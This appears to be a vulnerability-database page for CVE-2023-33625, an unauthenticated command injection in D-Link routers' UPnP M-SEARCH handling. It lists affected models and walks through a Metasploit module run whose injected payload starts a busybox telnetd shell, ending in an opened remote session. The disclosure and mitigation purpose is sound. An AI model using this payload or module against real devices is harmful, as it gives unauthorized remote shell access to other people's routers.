Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
None
Privileges Required
None
Attack Vector
Network
1

CVE-2023-33625

Disclosure Date: June 12, 2023
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Validated
Validated
Initial Access
Techniques
Validation
Validated
Validated

Description

D-Link DIR-600 Hardware Version B5, Firmware Version 2.18 was discovered to contain a command injection vulnerability via the ST parameter in the lxmldbc_system() function.

Add Assessment

2
Ratings
Technical Analysis

This vulnerability is based on an old theme that was discovered in 2013 by Zach Cutlip and explained in his blog The Shadow File. It is based on the infamous UPnP attack where a command injection vulnerability exists in multiple D-Link network products, allowing an attacker to inject arbitrary command to the UPnP via a crafted M-SEARCH packet.
Universal Plug and Play (UPnP), by default is enabled in most D-Link devices, on the port 1900 and an attacker can perform a remote command execution by injecting the payload into the Search Target (ST) field of the SSDP M-SEARCH discover packet.

What triggered my interest is the fact that 10 years after the discovery, this vulnerability still exists and is alive and kicking. Running a Shodan search title:"d-link" shows around 80.000 D-Link devices from which a considerable amount of devices are still vulnerable. Fortunately, this attack can only performed as a LAN based attack because the UPnP discovery service running on port 1900 is typically not exposed to Public Internet.

Besides the DIR-600 model, multiple other D-Link devices have the same vulnerability. I did some extensive testing with FirmAE to simulate and test different D-Link devices and found a comprehensive list of devices that are vulnerable:

  • D-Link Router model DIR-300 revisions Ax with firmware v1.06 or older;
  • D-Link Router model DIR-300 revisions Bx with firmware v2.15 or older;
  • D-Link Router model DIR-600 revisions Bx with firmware v2.18 or older;
  • D-Link Router model DIR-645 revisions Ax with firmware v1.05 or older;
  • D-Link Router model DIR-815 revisions Bx with firmware v1.04 or older;
  • D-Link Router model DIR-816L revisions Bx with firmware v2.06 or older;
  • D-Link Router model DIR-817LW revisions Ax with firmware v1.04b01_hotfix or older;
  • D-Link Router model DIR-818LW revisions Bx with firmware v2.05b03_Beta08 or older;
  • D-Link Router model DIR-822 revisions Bx with firmware v2.03b01 or older;
  • D-Link Router model DIR-822 revisions Cx with firmware v3.12b04 or older;
  • D-Link Router model DIR-823 revisions Ax with firmware v1.00b06_Beta or older;
  • D-Link Router model DIR-860L revisions Ax with firmware v1.12b05 or older;
  • D-Link Router model DIR-859 revisions Ax with firmware v1.06b01Beta01 or older;
  • D-Link Router model DIR-860L revisions Ax with firmware v1.10b04 or older;
  • D-Link Router model DIR-860L revisions Bx with firmware v2.03b03 or older;
  • D-Link Router model DIR-865L revisions Ax with firmware v1.07b01 or older;
  • D-Link Router model DIR-868L revisions Ax with firmware v1.12b04 or older;
  • D-Link Router model DIR-868L revisions Bx with firmware v2.05b02 or older;
  • D-Link Router model DIR-869 revisions Ax with firmware v1.03b02Beta02 or older;
  • D-Link Router model DIR-880L revisions Ax with firmware v1.08b04 or older;
  • D-Link Router model DIR-890L/R revisions Ax with firmware v1.11b01_Beta01 or older;
  • D-Link Router model DIR-885L/R revisions Ax with firmware v1.12b05 or older;
  • D-Link Router model DIR-895L/R revisions Ax with firmware v1.12b10 or older;
  • probably more looking at the scale of impacted devices :–(

In Metasploit, several modules are available to exploit this vulnerability, but unfortunately they all lack good check logic to determine if a D-Link device is vulnerable. Another limitation is that these modules only cover a part of the vulnerable devices during the exploit phase due to the fact that not all architectures are supported (mipsbe, mipsle and armle).

To overcome these limitations, I created a new module that has an enhanced check method that determines the D-Link device model, firmware information and architecture to determine if the device is vulnerable. Also I extended the exploit part to cover the missing armle architecture using the Linux Dropper target and I included a Unix Command target that leverages the busybox telnetd payload.

Module in Action

D-Link DIR-600 emulated target

# ./run.sh -d d-link /root/FirmAE/firmwares/DIR600B6_FW215WWb02.bin
[*] /root/FirmAE/firmwares/DIR600B6_FW215WWb02.bin emulation start!!!
[*] extract done!!!
[*] get architecture done!!!
mke2fs 1.47.0 (5-Feb-2023)
e2fsck 1.47.0 (5-Feb-2023)
[*] infer network start!!!

[IID] 25
[MODE] debug
[+] Network reachable on 192.168.0.1!
[+] Web service on 192.168.0.1
[+] Run debug!
Creating TAP device tap25_0...
Set 'tap25_0' persistent and owned by uid 0
Initializing VLAN...
Bringing up TAP device...
Starting emulation of firmware... 192.168.0.1 true true 60.479548271 107.007791943
/root/FirmAE/./debug.py:7: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
  import telnetlib
[*] firmware - DIR600B6_FW215WWb02
[*] IP - 192.168.0.1
[*] connecting to netcat (192.168.0.1:31337)
[+] netcat connected
------------------------------
|       FirmAE Debugger      |
------------------------------
1. connect to socat
2. connect to shell
3. tcpdump
4. run gdbserver
5. file transfer
6. exit
> 2
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

/ # uname -a
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
/ # hostname
dlinkrouter
/ #

Metasploit module

msf6 exploit(linux/upnp/dlink_msearch_unauth_lan_rce) > options

Module options (exploit/linux/upnp/dlink_msearch_unauth_lan_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.0.1      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   UPNP_PORT  1900             yes       Universal Plug and Play (UPnP) UDP port
   URIPATH                     no        The URI to use for this exploit (default is random)
   URN        urn:device:1     no        Set URN payload
   VHOST                       no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/unix/bind_busybox_telnetd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   LOGIN_CMD  /bin/sh          yes       Command telnetd will execute on connect
   LPORT      4444             yes       The listen port
   RHOST      192.168.0.1      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


View the full module info with the info, or info -d command.

msf6 exploit(linux/upnp/dlink_msearch_unauth_lan_rce) > check

[*] Checking if 192.168.0.1:80 can be exploited.
[*] 192.168.0.1:80 - The target appears to be vulnerable. Product info: DIR-600|2.15|Bx|mipsle
msf6 exploit(linux/upnp/dlink_msearch_unauth_lan_rce) > exploit

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.0.1:80 can be exploited.
[+] The target appears to be vulnerable. Product info: DIR-600|2.15|Bx|mipsle
[*] Executing Unix Command for cmd/unix/bind_busybox_telnetd
[*] payload: urn:device:1;`telnetd -l /bin/sh -p 4444`
[*] Started bind TCP handler against 192.168.0.1:4444
[*] Command shell session 1 opened (192.168.0.2:41797 -> 192.168.0.1:4444) at 2023-10-16 13:54:53 +0000


Shell Banner:
_!_
-----

# uname -a
uname -a
Linux dlinkrouter 4.1.17+ #28 Sat Oct 31 17:56:39 KST 2020 mips GNU/Linux
# hostname
hostname
dlinkrouter
#

You can find the module here in my local repository or as PR 18463 at the Metasploit Github development.

Mitigation

You should update your D-link network devices listed in this article to the latest available firmware.

References

CVE-2023-33625
CVE-2020-15893
CVE-2019–20215
D-Link DIR-859: UnAuthenticated RCE in ssdpcgi HTTP_ST
The Shadow File: DLink DIR-815 UPnP Command Injection
Multiple Vulnerabilities discovered in the D-link Firmware DIR-816L
D-link DIR-600 cmd injection vulnerability
D-Link UPnP Unauthenticated LAN RCE – h00die-gr3y Metasploit local repository
D-Link UPnP Unauthenticated LAN RCE – Metasploit PR 18463
D-Link Firmware Repository
FirmAE
FirmAE: Towards Large-Scale Emulation of IoT Firmware for Dynamic Analysis

Credits

  • Zach Cutlip
  • Michael Messner <devnull@s3cur1ty.de>
  • Miguel Mendez Z. (s1kr10s)
  • Pablo Pollanco (secenv)
  • Naihsin https://github.com/naihsin

And to all other good fellows who raised this concern ;–)

CVSS V3 Severity and Metrics
Base Score:
9.8 Critical
Impact Score:
5.9
Exploitability Score:
3.9
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
None
Scope (S):
Unchanged
Confidentiality (C):
High
Integrity (I):
High
Availability (A):
High

General Information

Vendors

  • dlink

Products

  • dir-600 firmware 2.18

Additional Info

Technical Analysis